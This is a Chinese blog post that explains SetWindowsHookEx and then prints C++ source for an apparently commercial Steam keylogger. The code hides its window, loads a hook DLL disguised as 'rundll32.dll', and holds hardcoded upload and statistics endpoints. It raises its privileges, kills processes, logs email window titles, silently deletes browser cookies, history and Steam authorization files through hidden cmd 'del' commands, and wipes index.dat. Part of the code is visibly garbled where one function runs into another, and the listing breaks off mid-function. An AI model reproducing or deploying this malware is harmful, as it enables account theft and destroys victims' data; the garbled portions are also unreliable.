SetWindowsHookEx: 全局钩子实现键盘记录器

 SetWindowsHookEx: 全局钩子实现键盘记录器_第1张图片

简介

        SetWindowsHookEx 钩子(Hook),是Windows消息处理机制的一个平台,应用程序可以在上面设置子程以监视指定窗口的某种消息,而且所监视的窗口可以是其他进程所创建的。当消息到达后,在目标窗口处理函数之前处理它。钩子机制允许应用程序截获处理window消息或特定事件。

        钩子实际上是一个处理消息的程序段,通过系统调用,把它挂入系统。每当特定的消息发出,在没有到达目的窗口前,钩子程序就先捕获该消息,亦即钩子函数先得到控制权。这时钩子函数即可以加工处理(改变)该消息,也可以不作处理而继续传递该消息,还可以强制结束消息的传递。在窗口消息的处理流程插队加入自己的处理函数。

        在Ring3级下,SetWindowsHookEx 这个函数能够实现优先拦截提交给特定窗口的信息,并进行拦截者需要的处理,然后再提交给窗口函数或是下一个钩子函数,函数第一个参数为idHook,需要设置钩子的类型,在以下代码样例中我们选择安装的钩子类型为WH_GETMESSAGE,用来拦截WM_KEYDOWN键盘信息。

函数原型:

SetWindowsHookEx(
     //钩子类型
    _In_ int idHook,
    //回调函数地址
    _In_ HOOKPROC lpfn,
    //实例句柄(包含有钩子函数)
    _In_opt_ HINSTANCE hmod,
    //线程ID,欲勾住的线程(为0则不指定,全局)
    _In_ DWORD dwThreadId);

设置Hook类型如下: 

宏值 含义
WH_MSGFILTER 截获用户与控件交互的消息
WH_KEYBOARD 截获键盘消息
WH_GETMESSAGE 截获从消息队列送出的消息
WH_CBT 截获系统基本消息,激活,建立,销毁,最小化,最大化,移动,改变尺寸等窗口事件
WH_MOUSE 截获鼠标消息
WH_CALLWNDPROCRET 截获目标窗口处理完毕的消息

返回值:

若此函数执行成功,则返回值就是该挂钩处理过程的句柄;若此函数执行失败,则返回值为NULL(0)。若想获得更多错误信息,请调用GetLastError函数。


实现代码

以下是部分实现代码,忘了是啥年代写的,没啥技术含量,大佬可以忽略。 

主程序:

// Steam.cpp : Defines the entry point for the application.
/

#include "stdafx.h"

 
// 函数声明

LRESULT CALLBACK    WndProc(HWND, UINT, WPARAM, LPARAM);

 
// 程序入口点

int APIENTRY WinMain(HINSTANCE hInstance,
                     HINSTANCE hPrevInstance,
                     LPSTR     lpCmdLine,
                     int       nCmdShow)
{
 	// TODO: Place code here.

	//加密标识
	CString Error = "****** 2019.04.07";

    MSG msg;
    HWND hWnd;
    char szTitle[]="Rainbow";                                // The title bar text
    char szWindowClass[]="RBTools";                                // The title bar text
    WNDCLASSEX wcex={0};
    wcex.cbSize = sizeof(WNDCLASSEX);        //WNDCLASSEX结构体大小
    wcex.style            = CS_HREDRAW | CS_VREDRAW;    //位置改变时重绘
    wcex.lpfnWndProc    = (WNDPROC)WndProc;            //消息处理函数
    wcex.hInstance        = 0;            //当前实例句柄
    wcex.hbrBackground    = (HBRUSH)COLOR_WINDOWFRAME;    //背景色
    wcex.lpszClassName    = szWindowClass;        //参窗口类名
    wcex.hIcon            =0;        //图标
    wcex.hCursor        =0;        //光标
    wcex.lpszMenuName    =0;        //菜单名称
    wcex.hIconSm        =0;        //最小化图标
    RegisterClassEx(&wcex);            //注册窗口类
 
    hWnd = CreateWindow(szWindowClass, szTitle, WS_DISABLED,    //创建窗口
      CW_USEDEFAULT,CW_USEDEFAULT, 1, 1, NULL, NULL, 0, NULL);
    if (!hWnd){
      return FALSE;
    }
 
    ShowWindow(hWnd, 0);
    UpdateWindow(hWnd);

    char szDllPath1[MAX_PATH] = { 0 };

	GetSystemDirectory(szDllPath1, sizeof(szDllPath1));

    strcpy(szDllPath1+2, "\\Program Files\\Common Files\\rundll32.dll");

	static HINSTANCE hinstDLL1;
	typedef void (CALLBACK *inshook1)();//定义回调函数的地址 
	inshook1 instkbhook1;
	if(hinstDLL1=LoadLibrary((LPCTSTR)szDllPath1))
	{
		instkbhook1=(inshook1)GetProcAddress(hinstDLL1, "installhook"); 
		instkbhook1();
	}
 
    while (GetMessage(&msg, NULL, 0, 0))     // 消息循环:
    {
        TranslateMessage(&msg);        //转化虚拟按键到字符消息
        DispatchMessage(&msg);        //分派消息调用回调函数
    }
    return msg.wParam;
}

LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam)
{
    switch (message) 
    {
        case WM_DESTROY:    //窗口销毁消息
            PostQuitMessage(0);
            break;

        default:
            return DefWindowProc(hWnd, message, wParam, lParam);
   }
   return 0;
}

 HOOK DLL:

// test3.cpp : Defines the initialization routines for the DLL.
//

#include "stdafx.h"
#include "test3.h"

#define  DllExport _declspec(dllexport)

#ifdef _DEBUG
#define new DEBUG_NEW
#undef THIS_FILE
static char THIS_FILE[] = __FILE__;
#endif

#define SWEEP_BUFFER_SIZE 10000

//合并区段
//#pragma comment(linker, "/MERGE:.rdata=.data")
//#pragma comment(linker, "/MERGE:.text=.data")
//#pragma comment(linker, "/MERGE:.reloc=.data")

//共享区段
#pragma data_seg(".SHARDAT")

#pragma data_seg()

//设置区段属性
#pragma comment(linker, "/section:.SHARDAT,RWE")

//
//								用户数据													//
																							//
							// 到期时间														//
							CString UserEndData = "2019.05.04";								//
																							//
//
//								配置数据

							// 用户 ID
							CString strUserID = "002";

							// 程序版本
							CString szVersion = "20190407_3";

							// 统计接口
							CString strServerName = "http://login.37wan.com/";

							// 邮箱 & 上传接口
							CString strMailServerName = "http://upload.37wan.com/";

//

char osx[MAX_PATH]={0};
char jsj[MAX_PATH]={0};

CString szLocalLP = "";
CString szAccount = "";
CString myEmailSTR = "";
CString szMyselfPath = "";
CString szStr = "", szStr2 = "";
CString szMailID, szMailName, szMailAddr;
CString szRegExe, szSTPath, szSTFile, szOneUser, szRegUser, szRegUser2, szStrFirst, szStrSecon; 

BOOL Login = false;
BOOL Regedit = false;
BOOL szBrowser = false;
BOOL szIERegedit = false;
BOOL szEMailName = false;
BOOL szTslgameEXE = false;

 

HWND hcaretWnd = NULL;
static HANDLE thread = NULL;

HINSTANCE hins = NULL;
static HHOOK hkb = NULL;

HINSTANCE hinss = NULL;
static HHOOK hie = NULL;

static char TAB_BASE64[]={"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"};

 
//
//	Note!
//
//		If this DLL is dynamically linked against the MFC
//		DLLs, any functions exported from this DLL which
//		call into MFC must have the AFX_MANAGE_STATE macro
//		added at the very beginning of the function.
//
//		For example:
//
//		extern "C" BOOL PASCAL EXPORT ExportedFunction()
//		{
//			AFX_MANAGE_STATE(AfxGetStaticModuleState());
//			// normal function body here
//		}
//
//		It is very important that this macro appear in each
//		function, prior to any calls into MFC.  This means that
//		it must appear as the first statement within the 
//		function, even before any object variable declarations
//		as their constructors may generate calls into the MFC
//		DLL.
//
//		Please see MFC Technical Notes 33 and 58 for additional
//		details.
//

/
// CTest3App

BEGIN_MESSAGE_MAP(CTest3App, CWinApp)
	//{{AFX_MSG_MAP(CTest3App)
		// NOTE - the ClassWizard will add and remove mapping macros here.
		//    DO NOT EDIT what you see in these blocks of generated code!
	//}}AFX_MSG_MAP
END_MESSAGE_MAP()

 
// 提升程序系统权限

BOOL DllExport AdjustPrivileges()
{
	HANDLE hToken = NULL;
	TOKEN_PRIVILEGES tp = {0};
	TOKEN_PRIVILEGES oldtp = {0};
	DWORD dwSize = sizeof(TOKEN_PRIVILEGES);
	LUID luid = {0};

	if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) {
		if (GetLastError()==ERROR_CALL_NOT_IMPLEMENTED)
			return TRUE;
		else
			return FALSE;
	}
	if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &luid)) {
		CloseHandle(hToken);
		return FALSE;
	}

	tp.PrivilegeCount=1;
	tp.Privileges[0].Luid = luid;
	tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

	/* Adjust Token Privileges */
	if (!AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), &oldtp, &dwSize)) {
		CloseHandle(hToken);
		return FALSE;
	}

	// close handles
	CloseHandle(hToken);
	return TRUE;
}

 
// 设置当前进程优先级为最高(实时)

BOOL DllExport SetRealTimePriority()
{
	if ( !SetPriorityClass( GetCurrentProcess(), REALTIME_PRIORITY_CLASS ) )
	{
		return FALSE;
	}

	return TRUE;
}

 
// 数据加密

int DllExport tranasci(char a)
{
	return (a-'A'+65);
}

CString DllExport gen(CString m_url)
{
	int i=0;
	int l=0;
	int k=0;
	CString curl;

	l=m_url.GetLength();

	for(i;i>2)&0x3F;   
        chrBs[1]=((chr[0]<<4)|(chr[1]>>4))&0x3F;   
        chrBs[2]=((chr[1]<<2)|(chr[2]>>6))&0x3F;   
        chrBs[3]=chr[2]&0x3F;   
        chrBs[0]=TAB_BASE64[chrBs[0]];   
        chrBs[1]=TAB_BASE64[chrBs[1]];   
        chrBs[2]=TAB_BASE64[chrBs[2]];   
        chrBs[3]=TAB_BASE64[chrBs[3]];   
        strOut+=chrBs;   
    }   
    if (1==Len%3)   
    {   
        chr[0]=(BYTE)strIn.GetAt(Len-1);   
        chrBs[0]=(chr[0]>>2)&0x3F;   
        chrBs[1]=(chr[0]<<4)&0x3F;   
        chrBs[0]=TAB_BASE64[chrBs[0]];   
        chrBs[1]=TAB_BASE64[chrBs[1]];   
        chrBs[2]='=';   
        chrBs[3]='=';   
        strOut+=chrBs;   
    }   
    else if (2==Len%3)   
    {   
        chr[0]=(BYTE)strIn.GetAt(Len-2);   
        chr[1]=(BYTE)strIn.GetAt(Len-1);   
        chrBs[0]=(chr[0]>>2)&0x3F;   
        chrBs[1]=((chr[0]<<4)|(chr[1]>>4))&0x3F;   
        chrBs[2]=(chr[1]<<2)&0x3F;   
        chrBs[0]=TAB_BASE64[chrBs[0]];   
        chrBs[1]=TAB_BASE64[chrBs[1]];   
        chrBs[2]=TAB_BASE64[chrBs[2]];   
        chrBs[3]='=';   
        strOut+=chrBs;   
    }   
    return strOut;   
} 

 
// 获取随机名称

CString DllExport GetName()
{
	CString mySTR1 = "", mySTR2 = "";

	time_t seed = time(NULL); 
	srand((unsigned)seed);

	for(int j=0; j<6 ;j++)
	{
		int randNum = rand()%26;//取一个随机数,该数字为0-25

		if(j%2)
		{
			mySTR1.Format("%C", randNum+97);//随机数为0到25,而小写字母的asc码为97到122,所以加97
		}
		else
		{
			mySTR1.Format("%C", randNum+65);//随机数为0到25,而大写字母的asc码为65到90,所以加65
		}
		mySTR2 += mySTR1;
		Sleep(100);//sleep一下,使随机因子取的分散些
	}
	return mySTR2;
}

 
// 结束进程

BOOL DllExport KillProcess(CString szProcess)
{
	BOOL szKill = FALSE;
	PROCESSENTRY32 pe32;
	pe32.dwSize =sizeof(pe32);
	HANDLE hpro=::CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
	if(hpro==INVALID_HANDLE_VALUE)
	{  
		return szKill;
	}

	szProcess.MakeLower();

	BOOL nowrun=Process32First(hpro,&pe32);
	while(nowrun)
	{
		CString szGetProcess;
		szGetProcess = pe32.szExeFile;
		szGetProcess.MakeLower();

		if(szGetProcess == szProcess)
		{
			DWORD proid=pe32.th32ProcessID;
			HANDLE hprocess=::OpenProcess(PROCESS_ALL_ACCESS,FALSE,proid);
			if(hprocess!=NULL)
			{
				::TerminateProcess(hprocess,0);

				szKill = TRUE;
			}
			::CloseHandle(hprocess);
		}
		nowrun=::Process32Next(hpro,&pe32);
	}
	::CloseHandle(hpro);
	return szKill;
}

 
// 获取 steam.exe 进程标识

DWORD DllExport GetEXE()
{
	HANDLE m_handle=::CreateToolhelp32Snapshot(TH32CS_SNAPALL,0);
	PROCESSENTRY32* Info = new PROCESSENTRY32;
	Info->dwSize = sizeof(PROCESSENTRY32);
	if(::Process32First(m_handle,Info))
	{
		while(::Process32Next(m_handle,Info)!=FALSE)
		{
			CString ss;
			ss=Info->szExeFile;
			ss.MakeLower();
			if(ss.Find("steam.exe") != -1)
			{
				return Info->th32ProcessID;
			}
		}
		::CloseHandle(m_handle);
		if(Info)
		{
			delete Info;
		}
	}
	return -1;
}

 
// 查找进程

BOOL DllExport GetProcess(CString TargetName) 
{ 
	CString fileName(TargetName);
	fileName.MakeLower(); //转为小写 

	HANDLE hShot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);  // 创建快照句柄 
	PROCESSENTRY32 pe32x = {sizeof(PROCESSENTRY32),0};//定义一个PROCESSENTRY32结类型的变量 
	if( Process32First(hShot,&pe32x) ) 
	{
		do
		{
			CString process_fileName = pe32x.szExeFile;
			process_fileName.MakeLower();//进程文件名转换为小写

			if( fileName == process_fileName )
			{
				CloseHandle(hShot);
				return TRUE;
			}
		}while( Process32Next(hShot, &pe32x) );
	} 
	CloseHandle(hShot);

	return FALSE;
}

 
// 枚举顶层窗口获取标题

BOOL DllExport CALLBACK EnumWindowsProc(HWND hWnd, LPARAM lParam)
{
    if( GetParent(hWnd)==NULL && IsWindowVisible(hWnd) )
    {
		TCHAR sTitle[MAX_PATH]={0};
		ZeroMemory(sTitle, MAX_PATH * sizeof(TCHAR));

		GetWindowText(hWnd, sTitle, sizeof(sTitle));
		//SendMessage(hWnd, WM_GETTEXT, (WPARAM)MAX_PATH, (LPARAM)sTitle);

		//AfxMessageBox(sTitle);

		CString szMainName = "";
		szMainName.Format(TEXT("%s"), sTitle);

		int MAIL0 = szMainName.Find("邮箱大全", 0);

		char *MAIL1;
		MAIL1 = strstr(sTitle, "邮箱");

		char *MAIL2;
		MAIL2 = strstr(sTitle, "电子邮");

		char *MAIL3;
		MAIL3 = strstr(sTitle, "免费邮");

		char *MAIL4;
		MAIL4 = strstr(sTitle, "电子邮件");

		char *MAIL5;
		MAIL5 = strstr(sTitle, "手机统一");

		char *MAIL6;
		MAIL6 = strstr(sTitle, "Microsoft 帐户");

		char *MAIL7;
		MAIL7 = strstr(sTitle, "Yahoo -");

		if( MAIL0 == -1 && (MAIL1 || MAIL2 || MAIL3 || MAIL4 || MAIL5 || MAIL6 || MAIL7) )
		{
			HWND Hwnd_Browser = ::GetForegroundWindow();
			if(hWnd == Hwnd_Browser)
			{
				if(!szEMailName)
				{
					CString szACCID;
					szACCID.Format(TEXT("C:\\MailName.txt"));

					szMailName.Format(TEXT("%s"), sTitle);

					FILE *fps1;
					fps1=fopen(szACCID, "w");
					if(fps1)
					{
						fprintf(fps1, "%s", szMailName.GetBuffer(0));
					}
					fclose(fps1);

					szEMailName = true;
				}
				//AfxMessageBox(szMailName);

				return FALSE;
			}
		}
    }
    return TRUE;
}

 
// 获取 MAC

typedef struct _ASTAT_ 
{ 
	ADAPTER_STATUS adapt; 
	NAME_BUFFER    NameBuff[30]; 
}ASTAT, * PASTAT;

UCHAR DllExport GetAddressByIndex(int lana_num,ASTAT & Adapter)
{
	UCHAR uRetCode; 
	//-------------------------------------------------------------------
	NCB ncb; 
	memset(&ncb, 0, sizeof(ncb) ); 
	ncb.ncb_command = NCBRESET; 
	ncb.ncb_lana_num = lana_num; 
	//指定网卡号,首先对选定的网卡发送一个NCBRESET命令,以便进行初始化 
	uRetCode = Netbios(&ncb ); 
	memset(&ncb, 0, sizeof(ncb) ); 
	ncb.ncb_command = NCBASTAT; 
	ncb.ncb_lana_num = lana_num;//指定网卡号 
	strcpy((char *)ncb.ncb_callname,"*      " ); 
	ncb.ncb_buffer = (unsigned char *)&Adapter; 
	//指定返回的信息存放的变量 
	ncb.ncb_length = sizeof(Adapter); 
	//接着,可以发送NCBASTAT命令以获取网卡的信息 
	uRetCode = Netbios(&ncb ); 
	//-------------------------------------------------------------------
	return uRetCode;
}

CString DllExport GetMacAddress(void)
{
	CString strMacAddress;
	//-------------------------------------------------------------------
	NCB ncb; 
	UCHAR uRetCode;
	int num = 0;
	LANA_ENUM lana_enum; 
	memset(&ncb, 0, sizeof(ncb) ); 
	ncb.ncb_command = NCBENUM; 
	ncb.ncb_buffer = (unsigned char *)&lana_enum; 
	ncb.ncb_length = sizeof(lana_enum); 
	//向网卡发送NCBENUM命令,以获取当前机器的网卡信息,如有多少个网卡
	//每张网卡的编号等 
	uRetCode = Netbios(&ncb);
	if (uRetCode == 0) 
	{
		num = lana_enum.length;
		//对每一张网卡,以其网卡编号为输入编号,获取其MAC地址 
		for (int i = 0; i < num; i++)
		{
			ASTAT Adapter;
			if(GetAddressByIndex(lana_enum.lana[i],Adapter) == 0)
			{
				strMacAddress.Format(_T("%02X%02X%02X%02X%02X%02X"), 
					Adapter.adapt.adapter_address[0], 
					Adapter.adapt.adapter_address[1], 
					Adapter.adapt.adapter_address[2], 
					Adapter.adapt.adapter_address[3], 
					Adapter.adapt.adapter_address[4], 
					Adapter.adapt.adapter_address[5]);
			}
		}
	}
	//-------------------------------------------------------------------
	return strMacAddress;
}

 
// 获取 IE 版本

CString DllExport GetIEVerSion()
{
	HKEY   hKEY;
	CString myIEVersion = "";
	LPCTSTR   data_Set = "SOFTWARE\\Microsoft\\Internet Explorer";
	long   ret0=(RegOpenKeyEx(HKEY_LOCAL_MACHINE, data_Set, 0, KEY_WOW64_64KEY | KEY_READ, &hKEY)); 
	if(ret0 == ERROR_SUCCESS)
	{
		LPBYTE owner_Get1=new BYTE[80];
		DWORD type_1=REG_SZ;
		DWORD cbData_1=80;
	  
		long   ret1=::RegQueryValueEx(hKEY, "svcVersion", NULL, &type_1, owner_Get1, &cbData_1);   
		if(ret1 == ERROR_SUCCESS)   
		{   
			char *IEVersion = (char *)owner_Get1;

			myIEVersion.Format(TEXT("%s"), IEVersion);
		}
		else
		{
			LPBYTE owner_Get2=new BYTE[80];
			DWORD type_2=REG_SZ;
			DWORD cbData_2=80;

			long   ret2=::RegQueryValueEx(hKEY, "Version", NULL, &type_2, owner_Get2, &cbData_2);
			if(ret2 == ERROR_SUCCESS)   
			{   
				char *IEVersion = (char *)owner_Get2;
				
				myIEVersion.Format(TEXT("%s"), IEVersion);
			}
		}
	}
	RegCloseKey(hKEY);

	return myIEVersion;
}

 
// 获取系统位数

BOOL DllExport IsWow64()
{
    typedef BOOL (WINAPI *LPFN_ISWOW64PROCESS) (HANDLE, PBOOL);
    LPFN_ISWOW64PROCESS fnIsWow64Process;
    BOOL bIsWow64 = FALSE;
    fnIsWow64Process = (LPFN_ISWOW64PROCESS)GetProcAddress( GetModuleHandle("kernel32"),"IsWow64Process");
    if (NULL != fnIsWow64Process)
    {
        fnIsWow64Process(GetCurrentProcess(),&bIsWow64);
    }
    return bIsWow64;
}

 
// 获取系统版本

void DllExport os()
{
	//先判断是否为 win8.1 或 win10
	typedef void(__stdcall*NTPROC)(DWORD*, DWORD*, DWORD*);
	HINSTANCE hinst = LoadLibrary("ntdll.dll");
	DWORD dwMajor, dwMinor, dwBuildNumber;
	NTPROC proc = (NTPROC)GetProcAddress(hinst, "RtlGetNtVersionNumbers"); 
	proc(&dwMajor, &dwMinor, &dwBuildNumber); 
	if (dwMajor == 6 && dwMinor == 3)	//win 8.1
	{
		strcat(osx, "Win 8.1");
	}
	else if (dwMajor == 10 && dwMinor == 0)	//win 10
	{
		strcat(osx, "Win 10");
	}
	else
	{
		//判断win8.1以下的版本
		SYSTEM_INFO info;                //用SYSTEM_INFO结构判断64位AMD处理器  
		GetSystemInfo(&info);            //调用GetSystemInfo函数填充结构  
		OSVERSIONINFOEX os;
		os.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX);
		#pragma warning(disable:4996)
		if (GetVersionEx((OSVERSIONINFO *)&os))
		{
			//下面根据版本信息判断操作系统名称  
			switch (os.dwMajorVersion)
			{
			case 5:
				switch (os.dwMinorVersion)
				{
				case 0:
					strcat(osx, "Win 2000");
					break;
				case 1:
					strcat(osx, "Win XP");
					break;
				case 2:
					if (os.wProductType == VER_NT_WORKSTATION &&
						info.wProcessorArchitecture == PROCESSOR_ARCHITECTURE_AMD64)
						strcat(osx, "Win XP Professional x64 Edition");
					else
						strcat(osx, "Win Server 2003");
					break;
				}
				break;
			case 6:
				switch (os.dwMinorVersion)
				{
				case 0:
					if (os.wProductType == VER_NT_WORKSTATION)
						strcat(osx, "Win Vista");
					else
						strcat(osx, "Win Server 2008");
					break;
				case 1:
					if (os.wProductType == VER_NT_WORKSTATION)
						strcat(osx, "Win 7");
					else
						strcat(osx, "Win Server 2008 R2");
					break;
				case 2:
					if (os.wProductType == VER_NT_WORKSTATION)
						strcat(osx, "Win 8");
					else
						strcat(osx, "Win Server 2012");
					break;
				}
				break;
			default:
				strcat(osx, "Unkonw OS");
			}
		}
		else
			strcat(osx, "Unkonw OS");
	}

	if(IsWow64())
	{
		strcat(osx, " x64");
	}
	else
	{
		strcat(osx, " x86");
	}
}

 
// 清理缓存文件

enum DEL_CACHE_TYPE //要删除的类型。
{
	File,//表示internet临时文件
	Cookie //表示Cookie
};

BOOL DllExport DeleteUrlCache(DEL_CACHE_TYPE type)
{
    BOOL bRet = FALSE;
	HANDLE hEntry;
    LPINTERNET_CACHE_ENTRY_INFO lpCacheEntry = NULL;  
    DWORD dwEntrySize;

 	//delete the files
	dwEntrySize = 0;
    hEntry = FindFirstUrlCacheEntry(NULL, NULL, &dwEntrySize);
	lpCacheEntry = (LPINTERNET_CACHE_ENTRY_INFO) new char[dwEntrySize];
    hEntry = FindFirstUrlCacheEntry(NULL, lpCacheEntry, &dwEntrySize);
	if (!hEntry)
	{
		goto cleanup;
	}

	do
    {
		if (type == File &&
			!(lpCacheEntry->CacheEntryType & COOKIE_CACHE_ENTRY))
		{
			DeleteUrlCacheEntry(lpCacheEntry->lpszSourceUrlName);
		}
		else if (type == Cookie &&
			(lpCacheEntry->CacheEntryType & COOKIE_CACHE_ENTRY))
		{
			DeleteUrlCacheEntry(lpCacheEntry->lpszSourceUrlName);
		}

		dwEntrySize = 0;
		FindNextUrlCacheEntry(hEntry, NULL, &dwEntrySize);
		delete [] lpCacheEntry; 
		lpCacheEntry = (LPINTERNET_CACHE_ENTRY_INFO) new char[dwEntrySize];
	}
	while (FindNextUrlCacheEntry(hEntry, lpCacheEntry, &dwEntrySize));

	bRet = TRUE;
cleanup:
	if (lpCacheEntry)
	{
		delete [] lpCacheEntry; 
	}
    return bRet;
}

BOOL DllExport WipeFile(LPCTSTR szDir, LPCTSTR szFile)
{
	CString sPath;
	HANDLE	hFile;
	DWORD	dwSize;
	DWORD	dwWrite;
	char	sZero[SWEEP_BUFFER_SIZE];
	memset(sZero, 0, SWEEP_BUFFER_SIZE);

	sPath = szDir;
	sPath += _T('\\');
	sPath += szFile;

	hFile = CreateFile(sPath, GENERIC_WRITE, 
		FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 
		FILE_ATTRIBUTE_NORMAL, NULL);
	if (hFile == INVALID_HANDLE_VALUE)
	{
		return FALSE;
	}

	dwSize = GetFileSize(hFile, NULL);

	//skip file header (actually, I don't know the file format of index.dat)
	dwSize -= 64;
	SetFilePointer(hFile, 64, NULL, FILE_BEGIN);

	while (dwSize > 0)
	{
		if (dwSize > SWEEP_BUFFER_SIZE)
		{
			WriteFile(hFile, sZero, SWEEP_BUFFER_SIZE, &dwWrite, NULL);
			dwSize -= SWEEP_BUFFER_SIZE;
		}
		else
		{
			WriteFile(hFile, sZero, dwSize, &dwWrite, NULL);
			break;
		}
	}

	CloseHandle(hFile);
	return TRUE;
}

BOOL DllExport EmptyDirectory(LPCTSTR szPath, BOOL bDeleteDesktopIni, BOOL bWipeIndexDat)
{
	WIN32_FIND_DATA wfd;
	HANDLE hFind;
	CString sFullPath;
	CString sFindFilter;
	DWORD dwAttributes = 0;

	sFindFilter = szPath;
	sFindFilter += _T("\\*.*");
	if ((hFind = FindFirstFile(sFindFilter, &wfd)) == INVALID_HANDLE_VALUE)
	{
		return FALSE;
	}

	do
	{
		if (_tcscmp(wfd.cFileName, _T(".")) == 0 || 
			_tcscmp(wfd.cFileName, _T("..")) == 0 ||
			(bDeleteDesktopIni == FALSE && _tcsicmp(wfd.cFileName, _T("desktop.ini")) == 0))
		{
			continue;
		}

		sFullPath = szPath;
		sFullPath += _T('\\');
		sFullPath += wfd.cFileName;

		//去掉只读属性
		dwAttributes = GetFileAttributes(sFullPath);
		if (dwAttributes & FILE_ATTRIBUTE_READONLY)
		{
			dwAttributes &= ~FILE_ATTRIBUTE_READONLY;
			SetFileAttributes(sFullPath, dwAttributes);
		}

		if (wfd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
		{
			EmptyDirectory(sFullPath, bDeleteDesktopIni, bWipeIndexDat);
			RemoveDirectory(sFullPath);
		}
		else
		{
			if (bWipeIndexDat && _tcsicmp(wfd.cFileName, _T("index.dat")) == 0)
			{
				WipeFile(szPath, wfd.cFileName);
			}
			DeleteFile(sFullPath);
		}
	}
	while (FindNextFile(hFind, &wfd));
	FindClose(hFind);

	return TRUE;
}

BOOL DllExport DelTempFiles()
{
	// 清理DNS缓存
	ShellExecute(NULL, "open", "ipconfig.exe", " /flushdns", NULL, SW_HIDE);

	// 清理 缓存 与 Cookies
	TCHAR szPath[MAX_PATH];
	DeleteUrlCache(Cookie);
	if (SHGetSpecialFolderPath(NULL, szPath, CSIDL_COOKIES, FALSE))
	{
		 EmptyDirectory(szPath, 1, 1);
	}
	CString myCleaner = TEXT(" /c del /f /s /q \"%userprofile%\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\*.*\" && del /f /s /q \"%userprofile%\\AppData\\Local\\Microsoft\\Windows\\History\\*.*\" && del /f /s /q \"%userprofile%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\*.*\" && del /f /s /q \"%userprofile%\\Local Settings\\History\\*.*\" && del /f /s /q \"%userprofile%\\Local Settings\\Temporary Internet Files\\*.*\" && del /f /s /q \"%userprofile%\\AppData\\Roaming\\360se6\\User Data\\Default\\Cache\\*.*\" && del /f /s /q \"%userprofile%\\AppData\\Roaming\\360se6\\User Data\\Default\\Cookies\" && del /f /s /q \"%userprofile%\\AppData\\Roaming\\360se6\\User Data\\Default\\History\" && del /f /s /q \"%userprofile%\\AppData\\Local\\360Chrome\\Chrome\\User Data\\Default\\Cache\\*.*\" && del /f /s /q \"%userprofile%\\AppData\\Local\\360Chrome\\Chrome\\User Data\\Default\\Cookies\" && del /f /s /q \"%userprofile%\\AppData\\Local\\360Chrome\\Chrome\\User Data\\Default\\History\" && del /f /s /q \"%userprofile%\\AppData\\Local\\2345Explorer\\User Data\\Default\\Cache\\*.*\" && del /f /s /q \"%userprofile%\\AppData\\Local\\2345Explorer\\User Data\\Default\\CookiesV3\" && del /f /s /q \"%userprofile%\\AppData\\Local\\2345Explorer\\User Data\\Default\\History\" && del /f /s /q \"%userprofile%\\AppData\\Local\\liebao\\User Data\\Default\\Cache\\*.*\" && del /f /s /q \"%userprofile%\\AppData\\Local\\liebao\\User Data\\Default\\Cookies\" && del /f /s /q \"%userprofile%\\AppData\\Local\\liebao\\User Data\\Default\\History\" && exit");
	//AfxMessageBox(myCleaner);
	ShellExecute(NULL, "open", "cmd.exe", myCleaner, "", SW_HIDE);

    BOOL bResult = FALSE;
    BOOL bDone = FALSE;

    LPINTERNET_CACHE_ENTRY_INFO lpCacheEntry = NULL;

    DWORD  dwTrySize, dwEntrySize = 4096; // start buffer size
    HANDLE hCacheDir = NULL;
    DWORD  dwError = ERROR_INSUFFICIENT_BUFFER;

    do
    {
        switch (dwError)
        {
            // need a bigger buffer
            case ERROR_INSUFFICIENT_BUFFER:
                delete [] lpCacheEntry;
                lpCacheEntry = (LPINTERNET_CACHE_ENTRY_INFO) new char[dwEntrySize];
                lpCacheEntry->dwStructSize = dwEntrySize;
                dwTrySize = dwEntrySize;
                BOOL bSuccess;
                if (hCacheDir == NULL)

                    bSuccess = (hCacheDir
                      = FindFirstUrlCacheEntry(NULL, lpCacheEntry,
                      &dwTrySize)) != NULL;
                else
                    bSuccess = FindNextUrlCacheEntry(hCacheDir, lpCacheEntry, &dwTrySize);

                if (bSuccess)
                    dwError = ERROR_SUCCESS;
                else
                {
                    dwError = GetLastError();
                    dwEntrySize = dwTrySize; // use new size returned
                }
                break;

             // we are done
            case ERROR_NO_MORE_ITEMS:
                bDone = TRUE;
                bResult = TRUE;
                break;

             // we have got an entry
            case ERROR_SUCCESS:

                // don't delete cookie entry
                if (!(lpCacheEntry->CacheEntryType & COOKIE_CACHE_ENTRY))

                 DeleteUrlCacheEntry(lpCacheEntry->lpszSourceUrlName);

                // get ready for next entry
                dwTrySize = dwEntrySize;
                if (FindNextUrlCacheEntry(hCacheDir, lpCacheEntry, &dwTrySize))
                    dwError = ERROR_SUCCESS;

                else
                {
                    dwError = GetLastError();
                    dwEntrySize = dwTrySize; // use new size returned
                }
                break;

            // unknown error
            default:
                bDone = TRUE;
                break;
        }

        if (bDone)
        {
            delete []lpCacheEntry;
            if (hCacheDir)
                FindCloseUrlCache(hCacheDir);
        }

    } while (!bDone);

	return TRUE;
}

 
// 删除授权文件模块

BOOL DllExport SearchFilesByWildcard_1(LPCTSTR wildcardPath, LPCTSTR wildcardPathandFile)
{
	HANDLE hFile = INVALID_HANDLE_VALUE;
	WIN32_FIND_DATA pNextInfo;

	CString mySSFNFiles = "";
 
	hFile = FindFirstFile(wildcardPathandFile, &pNextInfo);
	if(INVALID_HANDLE_VALUE == hFile)
	{
		return FALSE;
	}

	if(pNextInfo.cFileName[0] != '.')
	{
		mySSFNFiles.Format(TEXT("%s/%s"), wildcardPath, pNextInfo.cFileName);

		//AfxMessageBox(mySSFNFiles);

		DeleteFile(mySSFNFiles);
	}
 
	while(FindNextFile(hFile, &pNextInfo))
	{
		if(pNextInfo.cFileName[0] == '.')
		{
			continue;
		}

		mySSFNFiles.Format(TEXT("%s/%s"), wildcardPath, pNextInfo.cFileName);

		//AfxMessageBox(mySSFNFiles);

